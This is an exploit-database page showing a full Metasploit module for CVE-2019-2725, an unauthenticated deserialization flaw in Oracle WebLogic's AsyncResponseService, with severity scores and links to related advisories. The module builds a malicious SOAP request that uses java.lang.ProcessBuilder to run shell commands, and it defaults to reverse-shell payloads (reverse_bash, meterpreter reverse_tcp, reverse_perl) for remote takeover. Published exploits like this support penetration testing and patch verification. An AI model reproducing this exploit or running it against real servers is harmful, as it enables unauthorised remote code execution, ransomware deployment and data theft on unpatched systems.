Lucene search
MetasploitEDB-ID:46814HistoryMay 08, 2019 - 12:00 a.m.
Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)
2019-05-0800:00:00
Metasploit
www.exploit-db.com
226
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.976 High
EPSS
Percentile
100.0%
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a malicious SOAP request to the interface WLS AsyncResponseService
to execute code on the vulnerable host.
},
'Author' =>
[
'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-2725'],
['CNVD-C', '2019-48814'],
['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
],
[ 'Windows',
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 12
},
'DisclosureDate' => 'Apr 23 2019'))
register_options(
[
Opt::RPORT(7001),
OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(datastore['WSPATH']),
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => {'SOAPAction' => '' }
)
if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
Exploit::CheckCode::Vulnerable
elsif res && res.code != 202
vprint_status("The target returned a non-vulnerable HTTP code")
Exploit::CheckCode::Safe
elsif res.nil?
vprint_status("The target did not respond in an expected way")
Exploit::CheckCode::Unknown
else
vprint_status("The target returned HTTP code: #{res.code}")
vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
Exploit::CheckCode::Unknown
end
end
def exploit
print_status("Generating payload...")
case target.name
when 'Windows'
string0_cmd = 'cmd.exe'
string1_param = '/c'
shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
when 'Unix','Solaris'
string0_cmd = '/bin/bash'
string1_param = '-c'
shell_payload = payload.encoded
end
random_action = rand_text_alphanumeric(20)
random_relates = rand_text_alphanumeric(20)
soap_payload = %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
soap_payload << %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
soap_payload << %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
soap_payload << %Q|<soapenv:Header>|
soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|
soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
soap_payload << %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
soap_payload << %Q|<void class="java.lang.ProcessBuilder">|
soap_payload << %Q|<array class="java.lang.String" length="3">|
soap_payload << %Q|<void index="0">|
soap_payload << %Q|<string>#{string0_cmd}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="1">|
soap_payload << %Q|<string>#{string1_param}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="2">|
soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
#soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|</array>|
soap_payload << %Q|<void method="start"/>|
soap_payload << %Q|</void>|
soap_payload << %Q|</work:WorkContext>|
soap_payload << %Q|</soapenv:Header>|
soap_payload << %Q|<soapenv:Body>|
soap_payload << %Q|<asy:onAsyncDelivery/>|
soap_payload << %Q|</soapenv:Body>|
soap_payload << %Q|</soapenv:Envelope>|
uri = normalize_uri(datastore['WSPATH'])
if uri.nil?
datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
end
print_status("Sending payload...")
begin
res = send_request_cgi(
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml',
'data' => soap_payload,
'headers' => {'SOAPAction' => '' }
)
rescue Errno::ENOTCONN
fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
end
if res.nil?
fail_with(Failure::Unreachable, "No response from host")
elsif res && res.code != 202
fail_with(Failure::UnexpectedReply,"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
end
end
endRelated
exploitpack
exploitpack
Oracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution
2019-04-30 00:00:00
attackerkb
attackerkb
CVE-2019-2725
2019-04-26 00:00:00
myhack58
myhack58
githubexploit
githubexploit
Exploit for Injection in Oracle Agile Plm
2019-06-11 00:49:56
Exploit for Injection in Oracle Agile Plm
2020-08-31 14:09:09
Exploit for Injection in Oracle Agile Plm
2019-06-06 19:27:09
f5
f5
saint
saint
Oracle WebLogic Server deserialization remote code execution
2019-05-02 00:00:00
Oracle WebLogic Server deserialization remote code execution
2019-05-02 00:00:00
Oracle WebLogic Server deserialization remote code execution
2019-05-02 00:00:00
zdt
zdt
Oracle Weblogic Server Deserialization Remote Code Execution Exploit
2019-05-07 00:00:00
prion
prion
Design/Logic Flaw
2019-04-26 19:29:00
checkpoint_advisories
checkpoint_advisories
Oracle WebLogic Server Remote Code Execution (CVE-2019-2725)
2019-04-28 00:00:00
nessus
nessus
Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution
2019-04-26 00:00:00
Oracle WebLogic Server Multiple Vulnerabilities (Jul 2019 CPU)
2019-07-22 00:00:00
talosblog
talosblog
Threat Source (May 2, 2019)
2019-05-02 11:00:01
Threat Source newsletter (May 9)
2019-05-09 11:00:02
Sodinokibi ransomware exploits WebLogic Server vulnerability
2019-05-01 12:37:18
packetstorm
packetstorm
Oracle Weblogic Server Deserialization Remote Code Execution
2019-05-07 00:00:00
cve
cve
CVE-2019-2725
2019-04-26 19:29:00
cisa_kev
cisa_kev
Oracle WebLogic Server, Injection
2022-01-10 00:00:00
metasploit
metasploit
Oracle Weblogic Server Deserialization RCE - AsyncResponseService
2019-04-26 01:03:17
cisa
cisa
Oracle Releases Security Alert
2019-04-26 00:00:00
CISA Adds 15 Known Exploited Vulnerabilities to Catalog
2022-01-10 00:00:00
thn
thn
Hackers Found Exploiting Oracle WebLogic RCE Flaw to Spread Ransomware
2019-05-01 07:23:00
New Critical Oracle WebLogic Flaw Under Active Attack โ Patch Now
2019-06-19 18:42:00
Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers
2022-07-01 05:36:00
threatpost
threatpost
GandCrab Ransomware Shutters Its Operations
2019-06-03 14:18:01
New 'Sodinokibi' Ransomware Exploits Critical Oracle WebLogic Flaw
2019-04-30 19:20:13
Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig
2019-05-06 20:04:55
qualysblog
qualysblog
Introducing Periscope: Out-of-Band Vulnerability Detection Mechanism in Qualys WAS
2020-01-15 16:00:28
Identify Server-Side Attacks Using Qualys Periscope
2022-12-01 23:11:35
nuclei
nuclei
Oracle WebLogic Server - Remote Command Execution
2020-08-16 16:33:49
exploitdb
exploitdb
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
2019-04-30 00:00:00
malwarebytes
malwarebytes
Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void
2019-07-18 17:58:26
trendmicroblog
trendmicroblog
This Week in Security News: Spam Campaigns and Cryptocurrency Miners
2019-06-14 13:25:23
symantec
symantec
hivepro
hivepro
Muhstik botnet adds another vulnerability exploit to its arsenal
2022-03-29 12:17:03
securelist
securelist
IT threat evolution Q3 2019
2019-11-29 10:00:12
impervablog
impervablog
Imperva Detects Undocumented 8220 Gang Activities
2023-12-14 13:48:35
ics
ics
avleonov
avleonov
kitploit
kitploit
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2019
2019-07-16 00:00:00
Oracle Critical Patch Update Advisory - January 2020
2020-01-14 00:00:00
Oracle Critical Patch Update Advisory - July 2021
2021-07-20 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.976 High
EPSS
Percentile
100.0%
Related for EDB-ID:46814